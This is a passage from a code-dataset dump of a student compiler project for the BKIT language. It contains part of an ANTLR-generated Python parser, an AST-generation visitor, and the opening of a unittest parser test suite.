\"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \"'('\", \n \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \"';'\", \n \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\", \"INT_ARRAY\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Integer_literal\", \"Float_literal\", \n \"Boolean_literal\", \"String_literal\", \"BODY\", \"BREAK\", \n \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \"ELSEIF\", \"ENDBODY\", \n \"ENDFOR\", \"ENDWHILE\", \"FOR\", \"FUNCTION\", \"IF\", \"PARAMETER\", \n \"RETURN\", \"THEN\", \"VAR\", \"WHILE\", \"TRUE\", \"FALSE\", \n \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \"MINUS_INT\", \"MINUS_FLOAT\", \n \"STAR_INT\", \"STAR_FLOAT\", \"DIV_INT\", \"DIV_FLOAT\", \n \"MOD\", \"NOT\", \"AND\", \"OR\", \"EQUAL\", \"NOT_EQUAL_INT\", \n \"LESS_INT\", \"GREATER_INT\", \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \n \"NOT_EQUAL_FLOAT\", \"LESS_FLOAT\", \"GREATER_FLOAT\", \n \"LESS_OR_EQUAL_FLOAT\", \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \n \"RIGHT_PARENT\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \n \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n RULE_program = 0\n RULE_var_declare = 1\n RULE_function_declare = 2\n RULE_primitive_type = 3\n RULE_composite_type = 4\n RULE_array = 5\n RULE_bool_op = 6\n RULE_int_op = 7\n RULE_float_op = 8\n RULE_if_stmt = 9\n RULE_while_stmt = 10\n RULE_dowhile_stmt = 11\n\n ruleNames = [ \"program\", \"var_declare\", \"function_declare\", \"primitive_type\", \n \"composite_type\", \"array\", \"bool_op\", \"int_op\", \"float_op\", \n \"if_stmt\", \"while_stmt\", \"dowhile_stmt\" ]\n\n EOF = Token.EOF\n INT_ARRAY=1\n ID=2\n ILLEGAL_ESCAPE=3\n UNCLOSE_STRING=4\n COMMENT=5\n UNTERMINATED_COMMENT=6\n ERROR_CHAR=7\n WS=8\n Integer_literal=9\n Float_literal=10\n Boolean_literal=11\n String_literal=12\n BODY=13\n BREAK=14\n CONTINUE=15\n DO=16\n ELSE=17\n ELSELF=18\n ELSEIF=19\n ENDBODY=20\n ENDFOR=21\n ENDWHILE=22\n FOR=23\n FUNCTION=24\n IF=25\n PARAMETER=26\n RETURN=27\n THEN=28\n VAR=29\n WHILE=30\n TRUE=31\n FALSE=32\n ENDDO=33\n PLUS_INT=34\n PLUS_FLOAT=35\n MINUS_INT=36\n MINUS_FLOAT=37\n STAR_INT=38\n STAR_FLOAT=39\n DIV_INT=40\n DIV_FLOAT=41\n MOD=42\n NOT=43\n AND=44\n OR=45\n EQUAL=46\n NOT_EQUAL_INT=47\n LESS_INT=48\n GREATER_INT=49\n LESS_OR_EQUAL_INT=50\n GREATER_OR_EQUAL_INT=51\n NOT_EQUAL_FLOAT=52\n LESS_FLOAT=53\n GREATER_FLOAT=54\n LESS_OR_EQUAL_FLOAT=55\n GREATER_OR_EQUAL_FLOAT=56\n LEFT_PAREN=57\n RIGHT_PARENT=58\n LEFT_BRACKET=59\n RIGHT_BRACKET=60\n LEFT_BRACE=61\n RIGHT_BRACE=62\n COLON=63\n DOT=64\n SEMI=65\n COMMA=66\n ASSIGN=67\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def EOF(self):\n return self.getToken(BKITParser.EOF, 0)\n\n def var_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Var_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Var_declareContext,i)\n\n\n def function_declare(self, i:int=None):\n if i is None:\n return self.getTypedRuleContexts(BKITParser.Function_declareContext)\n else:\n return self.getTypedRuleContext(BKITParser.Function_declareContext,i)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 26 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n while True:\n self.state = 26\n self._errHandler.sync(self)\n token = self._input.LA(1)\n if token in [BKITParser.VAR]:\n self.state = 24\n self.var_declare()\n pass\n elif token in [BKITParser.FUNCTION]:\n self.state = 25\n self.function_declare()\n pass\n else:\n raise NoViableAltException(self)\n\n self.state = 28 \n self._errHandler.sync(self)\n _la = self._input.LA(1)\n if not (_la==BKITParser.FUNCTION or _la==BKITParser.VAR):\n break\n\n self.state = 30\n self.match(BKITParser.EOF)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Var_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def VAR(self):\n return self.getToken(BKITParser.VAR, 0)\n\n def SEMI(self):\n return self.getToken(BKITParser.SEMI, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_var_declare\n\n\n\n\n def var_declare(self):\n\n localctx = BKITParser.Var_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 2, self.RULE_var_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 32\n self.match(BKITParser.VAR)\n self.state = 33\n self.match(BKITParser.SEMI)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Function_declareContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def FUNCTION(self):\n return self.getToken(BKITParser.FUNCTION, 0)\n\n def COLON(self, i:int=None):\n if i is None:\n return self.getTokens(BKITParser.COLON)\n else:\n return self.getToken(BKITParser.COLON, i)\n\n def ID(self):\n return self.getToken(BKITParser.ID, 0)\n\n def PARAMETER(self):\n return self.getToken(BKITParser.PARAMETER, 0)\n\n def BODY(self):\n return self.getToken(BKITParser.BODY, 0)\n\n def ENDBODY(self):\n return self.getToken(BKITParser.ENDBODY, 0)\n\n def DOT(self):\n return self.getToken(BKITParser.DOT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_function_declare\n\n\n\n\n def function_declare(self):\n\n localctx = BKITParser.Function_declareContext(self, self._ctx, self.state)\n self.enterRule(localctx, 4, self.RULE_function_declare)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 35\n self.match(BKITParser.FUNCTION)\n self.state = 36\n self.match(BKITParser.COLON)\n self.state = 37\n self.match(BKITParser.ID)\n self.state = 38\n self.match(BKITParser.PARAMETER)\n self.state = 39\n self.match(BKITParser.BODY)\n self.state = 40\n self.match(BKITParser.COLON)\n self.state = 41\n self.match(BKITParser.ENDBODY)\n self.state = 42\n self.match(BKITParser.DOT)\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Primitive_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def Integer_literal(self):\n return self.getToken(BKITParser.Integer_literal, 0)\n\n def Float_literal(self):\n return self.getToken(BKITParser.Float_literal, 0)\n\n def String_literal(self):\n return self.getToken(BKITParser.String_literal, 0)\n\n def Boolean_literal(self):\n return self.getToken(BKITParser.Boolean_literal, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_primitive_type\n\n\n\n\n def primitive_type(self):\n\n localctx = BKITParser.Primitive_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 6, self.RULE_primitive_type)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 44\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.Integer_literal) | (1 << BKITParser.Float_literal) | (1 << BKITParser.Boolean_literal) | (1 << BKITParser.String_literal))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Composite_typeContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def array(self):\n return self.getTypedRuleContext(BKITParser.ArrayContext,0)\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_composite_type\n\n\n\n\n def composite_type(self):\n\n localctx = BKITParser.Composite_typeContext(self, self._ctx, self.state)\n self.enterRule(localctx, 8, self.RULE_composite_type)\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 46\n self.array()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class ArrayContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_array\n\n\n\n\n def array(self):\n\n localctx = BKITParser.ArrayContext(self, self._ctx, self.state)\n self.enterRule(localctx, 10, self.RULE_array)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Bool_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def NOT(self):\n return self.getToken(BKITParser.NOT, 0)\n\n def AND(self):\n return self.getToken(BKITParser.AND, 0)\n\n def OR(self):\n return self.getToken(BKITParser.OR, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_bool_op\n\n\n\n\n def bool_op(self):\n\n localctx = BKITParser.Bool_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 12, self.RULE_bool_op)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 50\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.NOT) | (1 << BKITParser.AND) | (1 << BKITParser.OR))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Int_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def PLUS_INT(self):\n return self.getToken(BKITParser.PLUS_INT, 0)\n\n def MINUS_INT(self):\n return self.getToken(BKITParser.MINUS_INT, 0)\n\n def STAR_INT(self):\n return self.getToken(BKITParser.STAR_INT, 0)\n\n def DIV_INT(self):\n return self.getToken(BKITParser.DIV_INT, 0)\n\n def MOD(self):\n return self.getToken(BKITParser.MOD, 0)\n\n def EQUAL(self):\n return self.getToken(BKITParser.EQUAL, 0)\n\n def NOT_EQUAL_INT(self):\n return self.getToken(BKITParser.NOT_EQUAL_INT, 0)\n\n def LESS_INT(self):\n return self.getToken(BKITParser.LESS_INT, 0)\n\n def GREATER_INT(self):\n return self.getToken(BKITParser.GREATER_INT, 0)\n\n def LESS_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_INT, 0)\n\n def GREATER_OR_EQUAL_INT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_INT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_int_op\n\n\n\n\n def int_op(self):\n\n localctx = BKITParser.Int_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 14, self.RULE_int_op)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 52\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_INT) | (1 << BKITParser.MINUS_INT) | (1 << BKITParser.STAR_INT) | (1 << BKITParser.DIV_INT) | (1 << BKITParser.MOD) | (1 << BKITParser.EQUAL) | (1 << BKITParser.NOT_EQUAL_INT) | (1 << BKITParser.LESS_INT) | (1 << BKITParser.GREATER_INT) | (1 << BKITParser.LESS_OR_EQUAL_INT) | (1 << BKITParser.GREATER_OR_EQUAL_INT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Float_opContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n def PLUS_FLOAT(self):\n return self.getToken(BKITParser.PLUS_FLOAT, 0)\n\n def MINUS_FLOAT(self):\n return self.getToken(BKITParser.MINUS_FLOAT, 0)\n\n def STAR_FLOAT(self):\n return self.getToken(BKITParser.STAR_FLOAT, 0)\n\n def DIV_FLOAT(self):\n return self.getToken(BKITParser.DIV_FLOAT, 0)\n\n def NOT_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.NOT_EQUAL_FLOAT, 0)\n\n def LESS_FLOAT(self):\n return self.getToken(BKITParser.LESS_FLOAT, 0)\n\n def GREATER_FLOAT(self):\n return self.getToken(BKITParser.GREATER_FLOAT, 0)\n\n def LESS_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.LESS_OR_EQUAL_FLOAT, 0)\n\n def GREATER_OR_EQUAL_FLOAT(self):\n return self.getToken(BKITParser.GREATER_OR_EQUAL_FLOAT, 0)\n\n def getRuleIndex(self):\n return BKITParser.RULE_float_op\n\n\n\n\n def float_op(self):\n\n localctx = BKITParser.Float_opContext(self, self._ctx, self.state)\n self.enterRule(localctx, 16, self.RULE_float_op)\n self._la = 0 # Token type\n try:\n self.enterOuterAlt(localctx, 1)\n self.state = 54\n _la = self._input.LA(1)\n if not((((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << BKITParser.PLUS_FLOAT) | (1 << BKITParser.MINUS_FLOAT) | (1 << BKITParser.STAR_FLOAT) | (1 << BKITParser.DIV_FLOAT) | (1 << BKITParser.NOT_EQUAL_FLOAT) | (1 << BKITParser.LESS_FLOAT) | (1 << BKITParser.GREATER_FLOAT) | (1 << BKITParser.LESS_OR_EQUAL_FLOAT) | (1 << BKITParser.GREATER_OR_EQUAL_FLOAT))) != 0)):\n self._errHandler.recoverInline(self)\n else:\n self._errHandler.reportMatch(self)\n self.consume()\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class If_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_if_stmt\n\n\n\n\n def if_stmt(self):\n\n localctx = BKITParser.If_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 18, self.RULE_if_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class While_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_while_stmt\n\n\n\n\n def while_stmt(self):\n\n localctx = BKITParser.While_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 20, self.RULE_while_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n class Dowhile_stmtContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_dowhile_stmt\n\n\n\n\n def dowhile_stmt(self):\n\n localctx = BKITParser.Dowhile_stmtContext(self, self._ctx, self.state)\n self.enterRule(localctx, 22, self.RULE_dowhile_stmt)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.6337043642997742, "alphanum_fraction": 0.6419832706451416, "avg_line_length": 42.45199966430664, "blob_id": "7aff4d8914f8c6662f7f376b02c7af84de068fee", "content_id": "5253006b01bfa778f747a97cb07ab59afe06d819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10871, "license_type": "no_license", "max_line_length": 146, "num_lines": 250, "path": "/Assignments/assignment2/src1.1/main/bkit/astgen/ASTGeneration.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "from BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n# from AST_GEN_TEST import *\nfrom functools import reduce\n\nclass ASTGeneration(BKITVisitor):\n\n def visitProgram(self,ctx:BKITParser.ProgramContext):\n # import pdb; pdb.set_trace()z\n var_decls = list(reduce(lambda y,x: y + self.visitVar_declare(x), [item for item in ctx.var_declare()], []))\n funcs_decls = list(reduce(lambda y,x: y + [self.visitFunction_declare(x)], [item for item in ctx.function_declare()], []))\n return Program(var_decls + funcs_decls)\n\n\n # Visit a parse tree produced by BKITParser#function_declare.\n def visitFunction_declare(self, ctx:BKITParser.Function_declareContext):\n funcName = Id(ctx.ID().getText())\n params = self.visitParams_list(ctx.params_list()) if ctx.params_list() else []\n declare = list(reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), []))\n stmt = list(reduce(lambda y, x: y + [self.visitStmt(x)], ctx.stmt(), []))\n return FuncDecl(funcName, params, tuple((declare,stmt)))\n\n\n # Visit a parse tree produced by BKITParser#primitive_data.\n def visitPrimitive_data(self, ctx:BKITParser.Primitive_dataContext):\n if ctx.INT_LIT():\n return IntLiteral(int(ctx.INT_LIT().getText().lower(), 0))\n if ctx.FLOAT_LIT():\n return FloatLiteral(float(ctx.FLOAT_LIT().getText()))\n if ctx.STRING_LIT():\n return StringLiteral(str(ctx.STRING_LIT().getText()))\n if ctx.BOOL_LIT():\n return BooleanLiteral(ctx.BOOL_LIT().getText() == \"True\")\n\n\n # Visit a parse tree produced by BKITParser#array_lit.\n def visitArray_lit(self, ctx:BKITParser.Array_litContext):\n data = [self.visit(datum) for datum in ctx.children if isinstance(datum, (BKITParser.Primitive_dataContext, BKITParser.Array_litContext))]\n return ArrayLiteral(data)\n\n\n # Visit a parse tree produced by BKITParser#var_list.\n def visitVar_list(self, ctx:BKITParser.Var_listContext):\n var_list = [self.visit(decl) for decl in ctx.children if isinstance(decl,(BKITParser.Var_non_initContext, BKITParser.Var_initContext))]\n return var_list\n\n # Visit a parse tree produced by BKITParser#var_non_init.\n def visitVar_non_init(self, ctx:BKITParser.Var_non_initContext):\n if ctx.getChildCount() == 1:\n return VarDecl(Id(ctx.ID().getText()), [], None)\n else:\n dim = map(lambda x: int(x, 0), [lit.getText() for lit in ctx.INT_LIT()])\n return VarDecl(Id(ctx.ID().getText()), dim, None)\n\n\n # Visit a parse tree produced by BKITParser#var_init.\n def visitVar_init(self, ctx:BKITParser.Var_initContext):\n if ctx.LEFT_BRACKET():\n dim = list(map(lambda x: int(x, 0), [lit.getText() for lit in ctx.INT_LIT()]))\n return VarDecl(Id(ctx.ID().getText()), dim, self.visit(ctx.children[-1]))\n else:\n return VarDecl(Id(ctx.ID().getText()), [], self.visit(ctx.children[-1]))\n\n\n # Visit a parse tree produced by BKITParser#params_list.\n def visitParams_list(self, ctx:BKITParser.Params_listContext):\n params_list = [self.visitVar_non_init(x) for x in ctx.var_non_init()]\n return params_list\n\n\n # Visit a parse tree produced by BKITParser#stmt_list.\n def visitStmt_list(self, ctx:BKITParser.Stmt_listContext):\n declare = reduce(lambda y, x: y + self.visitVar_declare_stmt(x), ctx.var_declare_stmt(), [])\n stmt = reduce(lambda y, x: y + [self.visitStmt(x)], ctx.stmt(), [])\n return (list(declare), list(stmt))\n\n def visitStmt(self, ctx:BKITParser.StmtContext):\n if ctx.if_stmt():\n return self.visitIf_stmt(ctx.if_stmt())\n if ctx.for_stmt():\n return self.visitFor_stmt(ctx.for_stmt())\n if ctx.while_stmt():\n return self.visitWhile_stmt(ctx.while_stmt())\n if ctx.dowhile_stmt():\n return self.visitDowhile_stmt(ctx.dowhile_stmt())\n if ctx.assign_stmt():\n return self.visitAssign_stmt(ctx.assign_stmt())\n if ctx.break_stmt():\n return self.visitBreak_stmt(ctx.break_stmt())\n if ctx.continue_stmt():\n return self.visitContinue_stmt(ctx.continue_stmt())\n if ctx.call_stmt():\n return self.visitCall_stmt(ctx.call_stmt())\n if ctx.return_stmt():\n return self.visitReturn_stmt(ctx.return_stmt())\n return []\n\n # Visit a parse tree produced by BKITParser#if_stmt.\n def visitIf_stmt(self, ctx:BKITParser.If_stmtContext):\n if_then_stmt = []\n else_stmt = []\n num_of_expr = len(ctx.expr())\n for idx in range(num_of_expr):\n expr = self.visitExpr(ctx.expr(idx))\n if ctx.stmt_list(idx):\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(idx))\n else:\n var_decls, stmt_list = [], []\n if_then_stmt += [tuple((expr, var_decls, stmt_list))]\n else_stmt = tuple(())\n if ctx.ELSE():\n var_decls, stmt_list = self.visitStmt_list(ctx.stmt_list(num_of_expr))\n else_stmt = tuple((var_decls, stmt_list))\n return If(if_then_stmt, else_stmt)\n\n\n # Visit a parse tree produced by BKITParser#for_stmt.\n def visitFor_stmt(self, ctx:BKITParser.For_stmtContext):\n iter_var = Id(ctx.ID().getText())\n expr1 = self.visitExpr(ctx.expr(0))\n expr2 = self.visitExpr(ctx.expr(1))\n expr3 = self.visitExpr(ctx.expr(2))\n loop = tuple(self.visitStmt_list(ctx.stmt_list()))\n return For(iter_var, expr1, expr2, expr3, loop)\n\n # Visit a parse tree produced by BKITParser#while_stmt.\n def visitWhile_stmt(self, ctx:BKITParser.While_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = tuple(self.visitStmt_list(ctx.stmt_list()))\n return While(expr, sl)\n\n # Visit a parse tree produced by BKITParser#dowhile_stmt.\n def visitDowhile_stmt(self, ctx:BKITParser.Dowhile_stmtContext):\n expr = self.visitExpr(ctx.expr())\n sl = tuple(self.visitStmt_list(ctx.stmt_list()))\n return Dowhile(sl, expr)\n\n # Visit a parse tree produced by BKITParser#assign_stmt\n def visitAssign_stmt(self, ctx:BKITParser.Assign_stmtContext):\n lhs = Id(ctx.ID().getText()) if ctx.ID() else self.visit( ctx.array_cell())\n rhs = self.visitExpr(ctx.expr())\n return Assign(lhs, rhs)\n\n # Visit a parse tree produced by BKITParser#array_cell.\n def visitArray_cell(self, ctx:BKITParser.Array_cellContext):\n arr = self.visitExpr7(ctx.expr7())\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return ArrayCell(arr, expr_list)\n\n # Visit a parse tree produced by BKITParser#break_stmt.\n def visitBreak_stmt(self, ctx:BKITParser.Break_stmtContext):\n return Break()\n\n # Visit a parse tree produced by BKITParser#continue_stmt.\n def visitContinue_stmt(self, ctx:BKITParser.Continue_stmtContext):\n return Continue()\n\n\n # Visit a parse tree produced by BKITParser#call_stmt.\n def visitCall_stmt(self, ctx:BKITParser.Call_stmtContext):\n expr_list = []\n if ctx.expr():\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return CallStmt(Id(ctx.ID().getText()), expr_list)\n\n\n # Visit a parse tree produced by BKITParser#return_stmt.\n def visitReturn_stmt(self, ctx:BKITParser.Return_stmtContext):\n return Return(self.visitExpr(ctx.expr()) if ctx.expr() else None)\n\n # Visit a parse tree produced by BKITParser#expr.\n def visitExpr(self, ctx:BKITParser.ExprContext):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr1(ctx.expr1(0)), self.visitExpr1(ctx.expr1(1)))\n return self.visitExpr1(ctx.expr1(0))\n\n\n # Visit a parse tree produced by BKITParser#expr1.\n def visitExpr1(self, ctx:BKITParser.Expr1Context):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr1(ctx.expr1()), self.visitExpr2(ctx.expr2()))\n return self.visitExpr2(ctx.expr2())\n\n\n # Visit a parse tree produced by BKITParser#expr2.\n def visitExpr2(self, ctx:BKITParser.Expr2Context):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr2(ctx.expr2()), self.visitExpr3(ctx.expr3()))\n return self.visitExpr3(ctx.expr3())\n\n\n # Visit a parse tree produced by BKITParser#expr3.\n def visitExpr3(self, ctx:BKITParser.Expr3Context):\n if ctx.getChildCount() > 2:\n return BinaryOp(ctx.children[1].getText(), self.visitExpr3(ctx.expr3()), self.visitExpr4(ctx.expr4()))\n return self.visitExpr4(ctx.expr4())\n\n\n # Visit a parse tree produced by BKITParser#expr4.\n def visitExpr4(self, ctx:BKITParser.Expr4Context):\n if ctx.NOT():\n return UnaryOp(ctx.NOT().getText(), self.visitExpr4(ctx.expr4()))\n return self.visitExpr5(ctx.expr5())\n\n\n # Visit a parse tree produced by BKITParser#expr5.\n def visitExpr5(self, ctx:BKITParser.Expr5Context):\n if ctx.MINUS_INT():\n return UnaryOp(ctx.MINUS_INT().getText(), self.visitExpr5(ctx.expr5()))\n if ctx.MINUS_FLOAT():\n return UnaryOp(ctx.MINUS_FLOAT().getText(), self.visitExpr5(ctx.expr5()))\n return self.visitExpr6(ctx.expr6())\n\n\n # Visit a parse tree produced by BKITParser#expr6.\n def visitExpr6(self, ctx:BKITParser.Expr6Context):\n if ctx.array_cell():\n return self.visitArray_cell(ctx.array_cell())\n return self.visitExpr7(ctx.expr7())\n\n\n # Visit a parse tree produced by BKITParser#expr7.\n def visitExpr7(self, ctx:BKITParser.Expr7Context):\n if ctx.function_call():\n return self.visitFunction_call(ctx.function_call())\n return self.visitExpr8(ctx.expr8())\n\n # Visit a parse tree produced by BKITParser#expr8.\n def visitExpr8(self, ctx:BKITParser.Expr8Context):\n if ctx.operand():\n return self.visitOperand(ctx.operand())\n if ctx.LEFT_PAREN:\n return self.visitExpr(ctx.expr())\n\n # Visit a parse tree produced by BKITParser#operand.\n def visitOperand(self, ctx:BKITParser.OperandContext):\n if ctx.ID():\n return Id(ctx.ID().getText())\n if ctx.primitive_data():\n return self.visitPrimitive_data(ctx.primitive_data())\n if ctx.array_lit():\n return self.visitArray_lit(ctx.array_lit())\n\n # Visit a parse tree produced by BKITParser#function_call.\n def visitFunction_call(self, ctx:BKITParser.Function_callContext):\n expr_list = []\n if ctx.expr():\n expr_list = list(map(lambda x: self.visitExpr(x), ctx.expr()))\n return CallExpr(Id(ctx.ID().getText()), expr_list)\n " }, { "alpha_fraction": 0.4645008146762848, "alphanum_fraction": 0.49560749530792236, "avg_line_length": 27.8668270111084, "blob_id": "6c05ae1e5c8e5f7b0fcd345dcca66cc8f32298f5", "content_id": "69b7e8e752db4deabb72357555923512238fb1fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 36198, "license_type": "no_license", "max_line_length": 90, "num_lines": 1254, "path": "/Assignments/assignment1/src/test/ParserSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestParser\n\nclass ParserSuite(unittest.TestCase):\n def test_simple_program(self):\n \"\"\"Simple program: int main() {} \"\"\"\n input = \"\"\"Var: x;\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect = \"successful\"\n self.assertTrue(TestParser.checkParser(input,expect,201))\n \n def test_wrong_miss_close(self):\n \"\"\"Miss variable\"\"\"\n input = \"\"\"Var: ;\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect = \"Error on line 1 col 5: ;\"\n self.assertTrue(TestParser.checkParser(input,expect,202))\n\n def test_primitive_init_declare(self):\n input=\"\"\"Var: a,b=1;\n Function: main\n Body:\n Return;\n EndBody.\"\"\"\n expect= \"successful\"\n 